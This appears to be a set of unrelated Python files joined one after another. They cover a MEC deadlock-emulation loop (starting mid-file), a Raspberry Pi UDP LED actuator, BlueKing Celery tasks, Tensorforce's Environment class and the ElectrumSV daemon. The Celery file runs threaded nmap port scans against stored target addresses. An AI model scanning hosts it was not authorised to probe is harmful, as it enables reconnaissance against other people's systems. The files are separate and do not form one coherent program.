_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [0, 0]
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
|
actuator_v2.py
|
# USE ON RASPBERRY PI
import socket
import RPi.GPIO as GPIO
import threading
import time
# Pin voltage
HIGH = GPIO.HIGH
LOW = GPIO.LOW
# Networking
SRC_IP = '10.35.0.1' # The actuator.
DST_IP = '10.34.0.1' # The sensor.
PORT = 5005 # Port number used for sending and listening.
# Message
SNT_MSG = 'hello' # The hello message
MSG_ENC = 'UTF-8' # Message encoding.
D_TIME = 4 # Maximum dead time in seconds.
# Flashes lights. Used in conjunction with dead timer.
# If the timer exceeds threshold, flash lights.
def lightFlash():
GPIO.output(11, HIGH)
time.sleep(0.2)
GPIO.output(11, LOW)
time.sleep(0.2)
# Listens on UDP packets and returns the decoded data, as long as it's from the right IP and port.
# If if it fails, or the received IP doesn't match the sensor's IP, it returns '255'.
def listenonUDP(clientsocket):
lock = threading.Lock()
try:
lock.acquire()
data, (address, port) = clientsocket.recvfrom(1024)
lock.release()
if str(address) == DST_IP and int(port) == PORT: # checks for correct IP and PORT.
return data.decode(MSG_ENC) # return decoded data for use in the function lightState.
else:
return '255'
except KeyboardInterrupt: # Catches CTRL-C.
pass
except:
return '255'
# Thread1, lights LEDs. It uses the 'listenonUDP'-function to determine whether or not to turn on
# the LEDs. If it the string in the variable data matches 'True', it will turn on the LED according to the
# specifications. It it receives 'False', it will turn off the LEDs.
# If it receives a 'hello', it will update the dead timer. Every other string or data is disregarded.
def lightState(clientsocket):
lock = threading.Lock()
flag = 0 # Used for if statements, so they don't reset the timer if multiple packets containing the
# same data is received. 1 means 'True' has already been received, 0 for 'False'.
deadtimer = time.time() # Used for printing messages on screen if timer gets too great.
lighttimer = 0.0 # Used for determining when to light the second LED.
while True:
data = listenonUDP(clientsocket) # Calls the function and returns strings. 255 == no data from socket.
if data == '255' and time.time() - deadtimer >= D_TIME:
lightFlash() # Flashes light if dead timer is over threshold.
elif data == 'True' and flag == 0:
flag = 1
lighttimer = time.time()
deadtimer = time.time()
GPIO.output(7, HIGH)
elif data == 'True' and flag == 1:
deadtimer = time.time()
elif data == 'False' and flag == 1:
flag = 0
lighttimer = time.time()
deadtimer = time.time()
GPIO.output(7, LOW)
GPIO.output(11, LOW)
elif data == 'False' and flag == 0:
deadtimer = time.time()
elif data == 'hello':
deadtimer = time.time()
if time.time() - lighttimer > 5 and flag == 1:
GPIO.output(11, HIGH)
# Thread2, sends hello packets.
def sendUDP(clientsocket):
lock = threading.Lock() # Used for locking the sockets later. Prevents cancelling by the operating system.
timer = time.time() # used for sending packets containing the string 'hello' within intervals.
clientsocket.sendto(bytes('getState', MSG_ENC), (DST_IP, PORT)) # Gets the current state of the LEDs from the
# sensor. Used in case the temp is >26 during
# startup.
while True:
if time.time() - timer >= 0.5:
lock.acquire() # lock socket.
clientsocket.sendto(bytes(SNT_MSG, MSG_ENC), (DST_IP, PORT))
lock.release() # unlock socket.
timer = time.time() # Resets timer.
def main():
print('Running program')
GPIO.setmode(GPIO.BOARD) # Sets pin mode to BOARD (Pin numbers)
GPIO.setwarnings(False) # Suppresses startup warnings.
GPIO.setup(7, GPIO.OUT) # Sets pins as output.
GPIO.setup(11, GPIO.OUT)
GPIO.output(7, LOW) # Turns off lights at startup
GPIO.output(11, LOW)
clientsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
clientsocket.bind((SRC_IP, PORT)) # Binds the IP and port to the pi. Prevents the socket from closing.
clientsocket.setblocking(False) # Prevents wait time when reading from socket.
# That way, the socket always times out when there's no data to be read.
# Makes the functions lightState and sendUDP into threads and sends clientsocket as argument.
t1 = threading.Thread(target = lightState, args = (clientsocket,))
t2 = threading.Thread(target = sendUDP, args = (clientsocket,))
# Starts the threads.
t1.setDaemon(True)
t2.setDaemon(True)
t1.start()
t2.start()
while True:
print('If you want to exit the program, type quit')
try:
data = input()
if data == 'quit':
GPIO.cleanup()
clientsocket.close()
exit()
except KeyboardInterrupt:
GPIO.cleanup()
clientsocket.close()
exit()
except EOFError:
GPIO.cleanup()
clientsocket.close()
exit()
main()
|
celery_tasks.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云(BlueKing) available.
Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
celery 任务示例
本地启动celery命令: python manage.py celery worker --settings=settings
周期性任务还需要启动celery调度命令:python manage.py celerybeat --settings=settings
"""
import datetime
from celery import task
from celery.schedules import crontab
from celery.task import periodic_task
from common.log import logger
import os
import time
import re
import socket
from home_application.models import PortScanPara,PortScan
from threading import Thread
import nmap
def hostIpList():
return socket.gethostbyname_ex(socket.gethostname())[2]
def check_ip(ipAddr):
compile_ip=re.compile('^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
if compile_ip.match(ipAddr):
return True
else:
return False
def hostname():
sys = os.name
if sys == 'nt':
hostname = os.getenv('computername')
return hostname
elif sys == 'posix':
host = os.popen('echo $HOSTNAME')
try:
hostname = host.read()
return hostname
finally:
host.close()
else:
return 'Unkwon hostname'
def nmapScan(hostname,tip, port):
portscan_recode = PortScan(source_hostname=hostname, target_ip=tip, target_port=port,state="正在扫描...",protocol="TCP")
portscan_recode.save()
nmScan = nmap.PortScanner()
nmScan.scan(tip, port, arguments='-T4 -Pn')
state = nmScan[tip]['tcp'][int(port)]['state']
PortScan.objects.filter(source_hostname=hostname, target_ip=tip, target_port=port).update(state=state, scan_time=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(time.time())))
@task()
def async_portscan():
logger.error(u"celery 定时任务执行成功,async_portscan")
last_scantask = PortScanPara.objects.filter().last()
host = hostname();
source_hostname = last_scantask.source_hostname
target_ip = last_scantask.target_ip
target_port = last_scantask.target_port
target_ips = str(target_ip).split(',')
target_ports = str(target_port).split(',')
for target_ip in target_ips:
for target_port in target_ports:
t = Thread(target = nmapScan,args = (str(source_hostname), str(target_ip), str(target_port)))
t.start()
@task()
def async_task(x, y):
"""
定义一个 celery 异步任务
"""
logger.error(u"celery 定时任务执行成功,执行结果:{:0>2}:{:0>2}".format(x, y))
return x + y
def execute_task():
"""
执行 celery 异步任务
调用celery任务方法:
task.delay(arg1, arg2, kwarg1='x', kwarg2='y')
task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'})
delay(): 简便方法,类似调用普通函数
apply_async(): 设置celery的额外执行选项时必须使用该方法,如定时(eta)等
详见 :http://celery.readthedocs.org/en/latest/userguide/calling.html
"""
now = datetime.datetime.now()
logger.error(u"celery 定时任务启动,将在60s后执行,当前时间:{}".format(now))
# 调用定时任务
async_task.apply_async(args=[now.hour, now.minute], eta=now + datetime.timedelta(seconds=60))
@periodic_task(run_every=crontab(minute='*/5', hour='*', day_of_week="*"))
def get_time():
"""
celery 周期任务示例
run_every=crontab(minute='*/5', hour='*', day_of_week="*"):每 5 分钟执行一次任务
periodic_task:程序运行时自动触发周期任务
"""
execute_task()
now = datetime.datetime.now()
logger.error(u"celery 周期任务调用成功,当前时间:{}".format(now))
|
environment.py
|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from datetime import datetime
import importlib
import json
import os
import sys
from threading import Thread
from traceback import format_tb
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
"""
Tensorforce environment interface.
"""
@staticmethod
def create(
environment=None, max_episode_timesteps=None, remote=None, blocking=False, host=None,
port=None, **kwargs
):
"""
Creates an environment from a specification. In case of "socket-server" remote mode, runs
environment in server communication loop until closed.
Args:
environment (specification | Environment class/object): JSON file, specification key,
configuration dictionary, library module, `Environment` class/object, or gym.Env
(<span style="color:#C00000"><b>required</b>, invalid for "socket-client" remote
mode</span>).
max_episode_timesteps (int > 0): Maximum number of timesteps per episode, overwrites
the environment default if defined
(<span style="color:#00C000"><b>default</b></span>: environment default, invalid
for "socket-client" remote mode).
remote ("multiprocessing" | "socket-client" | "socket-server"): Communication mode for
remote environment execution of parallelized environment execution, "socket-client"
mode requires a corresponding "socket-server" running, and "socket-server" mode
runs environment in server communication loop until closed
(<span style="color:#00C000"><b>default</b></span>: local execution).
blocking (bool): Whether remote environment calls should be blocking
(<span style="color:#00C000"><b>default</b></span>: not blocking, invalid unless
"multiprocessing" or "socket-client" remote mode).
host (str): Socket server hostname or IP address
(<span style="color:#C00000"><b>required</b></span> only for "socket-client" remote
mode).
port (int): Socket server port
(<span style="color:#C00000"><b>required</b></span> only for "socket-client/server"
remote mode).
kwargs: Additional arguments.
"""
if remote not in ('multiprocessing', 'socket-client'):
if blocking:
raise TensorforceError.invalid(
name='Environment.create', argument='blocking',
condition='no multiprocessing/socket-client instance'
)
if remote not in ('socket-client', 'socket-server'):
if host is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='host', condition='no socket instance'
)
elif port is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='port', condition='no socket instance'
)
if remote == 'multiprocessing':
from tensorforce.environments import MultiprocessingEnvironment
environment = MultiprocessingEnvironment(
blocking=blocking, environment=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
return environment
elif remote == 'socket-client':
if environment is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='environment',
condition='socket-client instance'
)
elif max_episode_timesteps is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='socket-client instance'
)
elif len(kwargs) > 0:
raise TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='socket-client instance'
)
from tensorforce.environments import SocketEnvironment
environment = SocketEnvironment(host=host, port=port, blocking=blocking)
return environment
elif remote == 'socket-server':
from tensorforce.environments import SocketEnvironment
SocketEnvironment.remote(
port=port, environment=environment, max_episode_timesteps=max_episode_timesteps,
**kwargs
)
elif isinstance(environment, (EnvironmentWrapper, RemoteEnvironment)):
if max_episode_timesteps is not None:
TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='EnvironmentWrapper instance'
)
if len(kwargs) > 0:
TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='EnvironmentWrapper instance'
)
return environment
elif isinstance(environment, type) and \
issubclass(environment, (EnvironmentWrapper, RemoteEnvironment)):
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
elif isinstance(environment, Environment):
if max_episode_timesteps is not None:
environment = EnvironmentWrapper(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
return environment
elif isinstance(environment, type) and issubclass(environment, Environment):
environment = environment(**kwargs)
assert isinstance(environment, Environment)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
elif isinstance(environment, dict):
# Dictionary specification
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif isinstance(environment, str):
if os.path.isfile(environment):
# JSON file specification
with open(environment, 'r') as fp:
environment = json.load(fp=fp)
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif '.' in environment:
# Library specification
library_name, module_name = environment.rsplit('.', 1)
library = importlib.import_module(name=library_name)
environment = getattr(library, module_name)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
# Keyword specification
environment = tensorforce.environments.environments[environment]
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
from gym import Env
if isinstance(environment, Env) or \
(isinstance(environment, type) and issubclass(environment, Env)):
return Environment.create(
environment='gym', level=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
def __init__(self):
# first two arguments, if applicable: level, visualize=False
self._max_episode_timesteps = None
self._expect_receive = None
self._actions = None
def __str__(self):
return self.__class__.__name__
def states(self):
"""
Returns the state space specification.
Returns:
specification: Arbitrarily nested dictionary of state descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – state data type
(<span style="color:#00C000"><b>default</b></span>: "float").</li>
<li><b>shape</b> (<i>int | iter[int]</i>) – state shape
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>num_states</b> (<i>int > 0</i>) – number of discrete state values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum state value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def actions(self):
"""
Returns the action space specification.
Returns:
specification: Arbitrarily nested dictionary of action descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – action data type
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) – action shape
(<span style="color:#00C000"><b>default</b></span>: scalar).</li>
<li><b>num_actions</b> (<i>int > 0</i>) – number of discrete action values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum action value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def max_episode_timesteps(self):
"""
Returns the maximum number of timesteps per episode.
Returns:
int: Maximum number of timesteps per episode.
"""
return self._max_episode_timesteps
def close(self):
"""
Closes the environment.
"""
pass
def reset(self):
"""
Resets the environment to start a new episode.
Returns:
dict[state]: Dictionary containing initial state(s) and auxiliary information.
"""
raise NotImplementedError
def execute(self, actions):
"""
Executes the given action(s) and advances the environment by one step.
Args:
actions (dict[action]): Dictionary containing action(s) to be executed
(<span style="color:#C00000"><b>required</b></span>).
Returns:
((dict[state], bool | 0 | 1 | 2, float)): Dictionary containing next state(s), whether
a terminal state is reached or 2 if the episode was aborted, and observed reward.
"""
raise NotImplementedError
def start_reset(self):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'reset'
def start_execute(self, actions):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'execute'
assert self._actions is None
self._actions = actions
def receive_execute(self):
if self._expect_receive == 'reset':
self._expect_receive = None
return self.reset(), -1, None
elif self._expect_receive == 'execute':
self._expect_receive = None
assert self._actions is not None
states, terminal, reward = self.execute(actions=self._actions)
self._actions = None
return states, int(terminal), reward
else:
raise TensorforceError.unexpected()
class EnvironmentWrapper(Environment):
def __init__(self, environment, max_episode_timesteps):
super().__init__()
if isinstance(environment, EnvironmentWrapper):
raise TensorforceError.unexpected()
if environment.max_episode_timesteps() is not None and \
environment.max_episode_timesteps() < max_episode_timesteps:
raise TensorforceError.unexpected()
self.environment = environment
self.environment._max_episode_timesteps = max_episode_timesteps
self._max_episode_timesteps = max_episode_timesteps
def __str__(self):
return str(self.environment)
def states(self):
return self.environment.states()
def actions(self):
return self.environment.actions()
def close(self):
return self.environment.close()
def reset(self):
self.timestep = 0
return self.environment.reset()
def execute(self, actions):
assert self.timestep < self._max_episode_timesteps
states, terminal, reward = self.environment.execute(actions=actions)
terminal = int(terminal)
self.timestep += 1
if terminal == 0 and self.timestep >= self._max_episode_timesteps:
terminal = 2
return states, terminal, reward
class RemoteEnvironment(Environment):
@classmethod
def proxy_send(cls, connection, function, **kwargs):
raise NotImplementedError
@classmethod
def proxy_receive(cls, connection):
raise NotImplementedError
@classmethod
def proxy_close(cls, connection):
raise NotImplementedError
@classmethod
def remote_send(cls, connection, success, result):
raise NotImplementedError
@classmethod
def remote_receive(cls, connection):
raise NotImplementedError
@classmethod
def remote_close(cls, connection):
raise NotImplementedError
@classmethod
def remote(cls, connection, environment, max_episode_timesteps=None, **kwargs):
try:
environment = Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
while True:
function, kwargs = cls.remote_receive(connection=connection)
result = getattr(environment, function)(**kwargs)
cls.remote_send(connection=connection, success=True, result=result)
if function == 'close':
break
except BaseException:
try:
environment.close()
finally:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
finally:
cls.remote_close(connection=connection)
def __init__(self, connection, blocking=False):
super().__init__()
self.connection = connection
self.blocking = blocking
self.observation = None
self.thread = None
def send(self, function, **kwargs):
if self._expect_receive is not None:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = function
try:
self.__class__.proxy_send(connection=self.connection, function=function, **kwargs)
except BaseException:
self.__class__.proxy_close(connection=self.connection)
raise
def receive(self, function):
if self._expect_receive != function:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = None
try:
success, result = self.__class__.proxy_receive(connection=self.connection)
except BaseException:
self.__class__.proxy_close(connection=self.connection)
raise
if success:
return result
else:
self.__class__.proxy_close(connection=self.connection)
etype, value, traceback = result
raise TensorforceError(message='{}: {}'.format(etype, value)).with_traceback(traceback)
def __str__(self):
self.send(function='__str__')
return self.receive(function='__str__')
def states(self):
self.send(function='states')
return self.receive(function='states')
def actions(self):
self.send(function='actions')
return self.receive(function='actions')
def max_episode_timesteps(self):
self.send(function='max_episode_timesteps')
return self.receive(function='max_episode_timesteps')
def close(self):
if self.thread is not None:
self.thread.join()
if self._expect_receive is not None:
self.receive(function=self._expect_receive)
self.send(function='close')
self.receive(function='close')
self.__class__.proxy_close(connection=self.connection)
self.connection = None
self.observation = None
self.thread = None
def reset(self):
self.send(function='reset')
return self.receive(function='reset')
def execute(self, actions):
self.send(function='execute', actions=actions)
return self.receive(function='execute')
def start_reset(self):
if self.blocking:
self.send(function='reset')
else:
if self.thread is not None: # TODO: not expected
self.thread.join()
self.observation = None
self.thread = Thread(target=self.finish_reset)
self.thread.start()
def finish_reset(self):
assert self.thread is not None and self.observation is None
self.observation = (self.reset(), -1, None)
self.thread = None
def start_execute(self, actions):
if self.blocking:
self.send(function='execute', actions=actions)
else:
assert self.thread is None and self.observation is None
self.thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
self.thread.start()
def finish_execute(self, actions):
assert self.thread is not None and self.observation is None
self.observation = self.execute(actions=actions)
self.thread = None
def receive_execute(self):
if self.blocking:
if self._expect_receive == 'reset':
return self.receive(function='reset'), -1, None
else:
states, terminal, reward = self.receive(function='execute')
return states, int(terminal), reward
else:
if self.thread is not None:
# assert self.observation is None
return None
else:
assert self.observation is not None
observation = self.observation
self.observation = None
return observation
|
daemon.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Optional, Tuple, Any
import os
import time
import jsonrpclib
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer
from .version import PACKAGE_VERSION
from .wallet import ParentWallet
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
'''Tries to create the lockfile, using O_EXCL to
prevent races. If it succeeds it returns the FD.
Otherwise try and connect to the server specified in the lockfile.
If this succeeds, the server is returned. Otherwise remove the
lockfile and try again.'''
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except Exception:
# We do not want the full stacktrace, this will limit it.
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig) -> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
elif rpc_password == '':
logger.warning('RPC authentication is disabled.')
return rpc_user, rpc_password
class Daemon(DaemonThread):
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets = {}
# Setup JSONRPC server
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 0)
rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
self.cmd_runner = Commands(self.config, None, self.network)
for cmdname in known_commands:
server.register_function(getattr(self.cmd_runner, cmdname), cmdname)
server.register_function(self.run_cmdline, 'run_cmdline')
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
t.setDaemon(True)
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Any:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_wallet_path()
wallet = self.load_wallet(path, config.get('password'))
self.cmd_runner.parent_wallet = wallet
response = True
elif sub == 'close_wallet':
path = config.get_wallet_path()
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
if hasattr(app_state, 'windows'):
config.open_last_wallet()
path = config.get_wallet_path()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
def load_wallet(self, path: str, password: Optional[str]) -> ParentWallet:
# wizard will be launched if we return
if path in self.wallets:
wallet = self.wallets[path]
return wallet
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
return
if storage.is_encrypted():
if not password:
return
storage.decrypt(password)
if storage.requires_split():
return
if storage.requires_upgrade():
return
if storage.get_action():
return
parent_wallet = ParentWallet(storage)
self.start_wallet(parent_wallet)
return parent_wallet
def get_wallet(self, path: str) -> ParentWallet:
return self.wallets.get(path)
